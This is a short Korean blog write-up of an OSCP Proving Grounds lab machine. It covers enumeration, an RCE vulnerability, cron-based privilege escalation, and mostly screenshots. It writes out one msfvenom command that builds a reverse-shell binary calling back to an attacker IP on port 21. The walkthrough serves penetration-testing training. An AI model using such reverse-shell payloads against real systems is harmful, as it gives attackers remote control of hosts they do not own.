1. Enumeration
: NMAP
![](https://blog.kakaocdn.net/dn/dw3fxI/btrJWyFHN9g/PA6f6ueua04l1sf6spxxrk/img.png)
: Web enum
![](https://blog.kakaocdn.net/dn/crh7pO/btrJV8gn7pJ/rQ5Du5JcRwVkX9tWueKpJ1/img.png)
서비스 버전을 확인해 보면
RCE가 가능한 취약점이 있다.
2. Exploitation
쉘을 올리자마자
곧바로 실행되는 것이 아니라
10분 이상 기다려야 한다.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.84 LPORT=21 -f elf -o shell
![](https://blog.kakaocdn.net/dn/o0RDK/btrJWMDJFzu/uf0soYkvW4wF5r8gEOTM6k/img.png)
![](https://blog.kakaocdn.net/dn/tnKLA/btrJXS4v8fW/VT0u0AaWMPr35NpTfPSbvk/img.png)
침투 성공
3. Privilege Escalation
![](https://blog.kakaocdn.net/dn/doUDr3/btrJWOhlsI9/OAiUtKK0GekQFolRktKB81/img.png)
cron 설정 확인
![](https://blog.kakaocdn.net/dn/tMYnd/btrJWx06ZJB/0AAro2Nha5ZDYWxoVY5EPK/img.png)
![](https://blog.kakaocdn.net/dn/bilfHk/btrJU032Oux/ydFs7ok3pOAluTFxprE3Rk/img.png)
![](https://blog.kakaocdn.net/dn/c2ym4Q/btrJWmyMbwK/EQKx84ZTvajW8YQulGyCW0/img.png)
![](https://blog.kakaocdn.net/dn/dRY3zu/btrJWxthXSA/VgyugGnmaTFW1qrJfeU6AK/img.png)
![](https://blog.kakaocdn.net/dn/d5s0OY/btrJYzcAbYB/WHEBhTUkcrYqAYEksACkP1/img.png)
![](https://blog.kakaocdn.net/dn/bnUljB/btrJWNCEior/niUGd8ukkHbfEkJGWSlwAK/img.png)
![](https://blog.kakaocdn.net/dn/dL5VSM/btrJTQghjAA/DihyhrcnJ1yuKrWUge257K/img.png)
끝
728x90
'OSCP > Proving Ground' 카테고리의 다른 글
29. XposedAPI (GET TO WORK) - Linux (HTTP request smuggling) (0) | 2022.08.25 |
---|---|
28. Lunar (GET TO WORK) - Linux (php strcmp, nfs no_root_squash) (0) | 2022.08.20 |
26. Sona (GET TO WORK) - Linux (2) | 2022.08.15 |
25. Nibbles (GET TO WORK) - Linux (0) | 2022.08.15 |
24. Nappa(GET TO WORK) - Linux (0) | 2022.08.14 |